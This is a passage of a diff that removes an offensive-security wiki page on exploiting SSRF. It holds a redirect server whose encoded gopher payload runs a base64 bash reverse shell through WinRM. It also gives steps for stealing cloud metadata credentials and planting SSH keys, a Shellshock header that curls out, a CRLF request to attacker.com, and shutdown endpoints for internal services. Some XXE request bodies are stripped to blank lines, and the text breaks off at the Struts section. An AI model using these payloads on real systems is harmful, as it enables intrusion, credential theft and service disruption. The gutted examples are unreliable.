-### From SSRF to DoS
-
-Create several sessions and try to download heavy files exploiting the SSRF from the sessions.
-
-### SSRF Redirect to Gopher
-
-For some exploitations you might need to **send a redirect response** (potentially to use a different protocol like gopher). Here you have different python codes to respond with a redirect:
-
-```python
-# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
-from http.server import HTTPServer, BaseHTTPRequestHandler
-import ssl
-
-class MainHandler(BaseHTTPRequestHandler):
- def do_GET(self):
- print("GET")
- self.send_response(301)
- self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%2
0%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%
3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
- self.end_headers()
-
-httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
-httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
-httpd.serve_forever()
-```
-
-```python
-from flask import Flask, redirect
-from urllib.parse import quote
-app = Flask(__name__)
-
-@app.route('/')
-def root():
- return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
-
-if __name__ == "__main__":
- app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
-```
-
-### Abusing DNS Rebidding + TLS Session ID/Session ticket
-
-Requirements:
-
-* **SSRF**
-* **Outbound TLS sessions**
-* **Stuff on local ports**
-
-Attack:
-
-1. Ask the user/bot **access** a **domain** controlled by the **attacker**
-2. The **TTL** of the **DNS** is **0** sec (so the victim will check the IP of the domain again soon)
-3. A **TLS connection** is created between the victim and the domain of the attacker. The attacker introduces the **payload inside** the **Session ID or Session Ticket**.
-4. The **domain** will start an **infinite loop** of redirects against **himself**. The goal of this is to make the user/bot access the domain until it perform **again** a **DNS request** of the domain.
-5. In the DNS request a **private IP** address is given **now** (127.0.0.1 for example)
-6. The user/bot will try to **reestablish the TLS connection** and in order to do so it will **send** the **Session** ID/Ticket ID (where the **payload** of the attacker was contained). So congratulations you managed to ask the **user/bot attack himself**.
-
-Note that during this attack, if you want to attack localhost:11211 (_memcache_) you need to make the victim establish the initial connection with www.attacker.com:11211 (the **port must always be the same**).\
-To **perform this attack you can use the tool**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
-For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference)
-
-### Automated DNS Rebidding
-
-**``**[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
-
-Check out also the publicly running server in [http://rebind.it/singularity.html](http://rebind.it/singularity.html)
-
-## Exploitation in Cloud
-
-### Abusing SSRF in AWS EC2 environment
-
-#### 169.254.169.254 - Metadata Address
-
-**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
-
-The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. **AWS has no constraints**.
-
-Sending a GET requests to the following endpoint will **dump a list of roles** that are attached to the current EC2 instance:
-
-```
-http://169.254.169.254/latest/meta-data/iam/security-credentials/
-```
-
-If you want to access your S3 bucket you would normally hard-code your API keys into your application. Hard-coding clear text passwords is a bad idea. This is why you can assign your EC2 instance a role which can be used to access your S3 bucket. These credentials are automatically rotated by AWS and can be access thought the metadata API.
-
-Once you get a list of roles attached to the EC2 instance you can **dump their credentials** by making a GET requests to the following URL:
-
-```
-http://169.254.169.254/latest/meta-data/iam/security-credentials/
-```
-
-As an example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
-
-The response should look something like this:
-
-```
-{
- "Code" : "Success",
- "LastUpdated" : "2019-08-03T20:42:03Z",
- "Type" : "AWS-HMAC",
- "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ",
- "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR",
- "Token" : "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",
- "Expiration" : "2019-08-04T03:16:50Z"
-}
-```
-
-You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do. If the role has improper permissions set (Most likely) you will be able to do all kinds of things, you might even be able to take over their entire cloud network.
-
-To take advantage of the new credentials, you will need to crate a new AWS profile like this one:
-
-```
-[profilename]
-aws_access_key_id = ASIA6GG7PSQG4TCGYYOU
-aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
-aws_session_token = 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
-```
-
-Notice the **aws\_session\_token**, this is indispensable for the profile to work.\
-Information taken from: [http://ghostlulz.com/ssrf-aws-credentials/](http://ghostlulz.com/ssrf-aws-credentials/) (read that post for further information).\
-Another possible interesting place where you can find credentials is in[ http://169.254.169.254/user-data](http://169.254.169.254/user-data)
-
-[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
-
-### SSRF in AWS ECS (Container Service) credentials
-
-**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
-
-If you access _**http://169.254.170.2/v2/credentials/\**_ you will find the credentials of the ECS machine. But first you need to **find the \_\**\_ . To find the \ you need to read the **environ** variable **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** inside the machine.\
-You could be able to read it exploiting an **Path Traversal** to _file:///proc/self/environ_\
-\_\_The mentioned http address should give you the **AccessKey, SecretKey and token**.
-
-```bash
-curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
-```
-
-### SSRF URL for AWS Elastic Beanstalk
-
-We retrieve the `accountId` and `region` from the API.
-
-```
-http://169.254.169.254/latest/dynamic/instance-identity/document
-http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
-```
-
-We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.
-
-```
-http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
-```
-
-![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL)
-
-Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
-
-### SSRF URL for Google Cloud
-
-Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
-
-```
-http://169.254.169.254/computeMetadata/v1/
-http://metadata.google.internal/computeMetadata/v1/
-http://metadata/computeMetadata/v1/
-http://metadata.google.internal/computeMetadata/v1/instance/hostname
-http://metadata.google.internal/computeMetadata/v1/instance/id
-http://metadata.google.internal/computeMetadata/v1/project/project-id
-```
-
-Google allows recursive pulls
-
-```
-http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
-```
-
-Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
-
-```
-http://metadata.google.internal/computeMetadata/v1beta1/
-http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
-```
-
-Interesting files to pull out:
-
-* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json)
-* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token)
-* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json)
-
-### Add an SSH key
-
-Extract the token
-
-```
-http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
-```
-
-Check the scope of the token
-
-```
-$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA {
- "issued_to": "101302079XXXXX",
- "audience": "10130207XXXXX",
- "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
- "expires_in": 2443,
- "access_type": "offline"
-}
-```
-
-Now push the SSH key.
-
-```
-curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
--H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
--H "Content-Type: application/json"
---data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
-```
-
-### SSRF URL for Digital Ocean
-
-Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
-
-```
-curl http://169.254.169.254/metadata/v1/id
-http://169.254.169.254/metadata/v1.json
-http://169.254.169.254/metadata/v1/
-http://169.254.169.254/metadata/v1/id
-http://169.254.169.254/metadata/v1/user-data
-http://169.254.169.254/metadata/v1/hostname
-http://169.254.169.254/metadata/v1/region
-http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
-curl http://169.254.169.254/metadata/v1.json | jq
-```
-
-### SSRF URL for Packetcloud
-
-Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
-
-### SSRF URL for Azure
-
-Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
-
-[http://169.254.169.254/metadata/v1/maintenance](http://169.254.169.254/metadata/v1/maintenance)
-
-Update Apr 2017, Azure has more support; requires the header “Metadata: true” [`https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service)
-
-```
-http://169.254.169.254/metadata/instance?api-version=2017-04-02
-http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
-```
-
-### SSRF URL for OpenStack/RackSpace
-
-(header required? unknown)
-
-```
-http://169.254.169.254/openstack
-```
-
-### SSRF URL for HP Helion
-
-(header required? unknown)
-
-```
-http://169.254.169.254/2009-04-04/meta-data/
-```
-
-### SSRF URL for Oracle Cloud
-
-```
-http://192.0.0.192/latest/
-http://192.0.0.192/latest/user-data/
-http://192.0.0.192/latest/meta-data/
-http://192.0.0.192/latest/attributes/
-```
-
-### SSRF URL for Alibaba
-
-```
-http://100.100.100.200/latest/meta-data/
-http://100.100.100.200/latest/meta-data/instance-id
-http://100.100.100.200/latest/meta-data/image-id
-```
-
-### SSRF URL for Kubernetes ETCD
-
-Can contain API keys and internal ip and ports
-
-```
-curl -L http://127.0.0.1:2379/version
-curl http://127.0.0.1:2379/v2/keys/?recursive=true
-```
-
-### SSRF URL for Docker
-
-```
-http://127.0.0.1:2375/v1.24/containers/jsonSimple example
-docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
-bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
-bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
-```
-
-### SSRF URL for Rancher
-
-```
-curl http://rancher-metadata//
-```
-
-## Blind SSRF
-
-The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
-
-### Time based SSRF
-
-**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
-
-## Detect SSRF
-
-You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests (GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...).
-
-* [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
-* [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
-
-## To practice
-
-{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
-
-## Vulnerable Platforms
-
-This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
-
-## Elasticsearch
-
-**Commonly bound port: 9200**
-
-When Elasticsearch is deployed internally, it usually does not require authentication.
-
-If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200:
-
-```http
-/_cluster/health
-/_cat/indices
-/_cat/health
-```
-
-If you have a blind SSRF where you can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following path:
-
-Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and up. This only works in Elasticsearch 1.6 and below:
-
-```http
-/_shutdown
-/_cluster/nodes/_master/_shutdown
-/_cluster/nodes/_shutdown
-/_cluster/nodes/_all/_shutdown
-```
-
-## Weblogic
-
-**Commonly bound ports: 80, 443 (SSL), 7001, 8888**
-
-**SSRF Canary: UDDI Explorer (CVE-2014-4210)**
-
-```http
-POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
-Host: target.com
-Content-Length: 137
-Content-Type: application/x-www-form-urlencoded
-
-operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
-```
-
-This also works via GET:
-
-```bash
-http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
-```
-
-This endpoint is also vulnerable to CRLF injection:
-
-```
-GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0
-Host: vuln.weblogic
-Accept-Encoding: gzip, deflate
-Accept: */*
-Accept-Language: en
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
-Connection: close
-```
-
-Will result in the following request:
-
-```
-root@mail:~# nc -lvp 4000
-Listening on [0.0.0.0] (family 0, port 4000)
-Connection from example.com 43111 received!
-POST /exp HTTP/1.11
-X-CLRF: Injected HTTP/1.1
-Content-Type: text/xml; charset=UTF-8
-soapAction: ""
-Content-Length: 418
-User-Agent: Java1.6.0_24
-Host: attacker.com:4000
-Accept: text/html, image/gif, image/jpeg, */*; q=.2
-Connection: Keep-Alive
-
-sdf
-```
-
-**SSRF Canary: CVE-2020-14883**
-
-Taken from [here](https://forum.90sec.com/t/topic/1412).
-
-Linux:
-
-```http
-POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
-Host: vulnerablehost:7001
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9
-Connection: close
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 117
-
-_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")
-```
-
-Windows:
-
-```http
-POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
-Host: vulnerablehost:7001
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9
-Connection: close
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 117
-
-_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
-```
-
-## Hashicorp Consul
-
-**Commonly bound ports: 8500, 8501 (SSL)**
-
-Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html).
-
-## Shellshock
-
-**Commonly bound ports: 80, 443 (SSL), 8080**
-
-In order to effectively test for Shellshock, you may need to add a header containing the payload. The following CGI paths are worth trying:
-
-Short list of CGI paths to test:
-
-[Gist containing paths](https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4).
-
-**SSRF Canary: Shellshock via User Agent**
-
-```bash
-User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
-```
-
-## Apache Druid
-
-**Commonly bound ports: 80, 8080, 8888, 8082**
-
-See the API reference for Apache Druid [here](https://druid.apache.org/docs/latest/operations/api-reference.html).
-
-If you can view the status code, check the following paths to see if they return a 200 status code:
-
-```bash
-/status/selfDiscovered/status
-/druid/coordinator/v1/leader
-/druid/coordinator/v1/metadata/datasources
-/druid/indexer/v1/taskStatus
-```
-
-Shutdown tasks, requires you to guess task IDs or the datasource name:
-
-```bash
-/druid/indexer/v1/task/{taskId}/shutdown
-/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks
-```
-
-Shutdown supervisors on Apache Druid Overlords:
-
-```bash
-/druid/indexer/v1/supervisor/terminateAll
-/druid/indexer/v1/supervisor/{supervisorId}/shutdown
-```
-
-## Apache Solr
-
-**Commonly bound port: 8983**
-
-**SSRF Canary: Shards Parameter**
-
-> To add to what shubham is saying - scanning for solr is relatively easy. There is a shards= param which allows you to bounce SSRF to SSRF to verify you are hitting a solr instance blindly.
->
-> — Хавиж Наффи 🥕 (@nnwakelam) [January 13, 2021](https://twitter.com/nnwakelam/status/1349298311853821956?ref\_src=twsrc%5Etfw)
-
-Taken from [here](https://github.com/veracode-research/solr-injection).
-
-```bash
-/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}
-/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json
-/xxx?q=aaa%26shards=http://SSRF_CANARY/solr
-/xxx?q=aaa&shards=http://SSRF_CANARY/solr
-```
-
-**SSRF Canary: Solr XXE (2017)**
-
-[Apache Solr 7.0.1 XXE (Packetstorm)](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html)
-
-```bash
-/solr/gettingstarted/select?q={!xmlparser v=''
-/xxx?q={!type=xmlparser v=""}
-```
-
-**RCE via dataImportHandler**
-
-[Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler)
-
-## PeopleSoft
-
-**Commonly bound ports: 80,443 (SSL)**
-
-Taken from this research [here](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce).
-
-**SSRF Canary: XXE #1**
-
-```http
-POST /PSIGW/HttpListeningConnector HTTP/1.1
-Host: website.com
-Content-Type: application/xml
-...
-
-
-
-]>
-
- &x;
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- your_message_content]]>
-
-
-
-
-```
-
-**SSRF Canary: XXE #2**
-
-```http
-POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
-Host: website.com
-Content-Type: application/xml
-...
-
-
-```
-
-## Apache Struts
-
-**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
-
-Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
-
-**SSRF Canary: Struts2-016**:
-
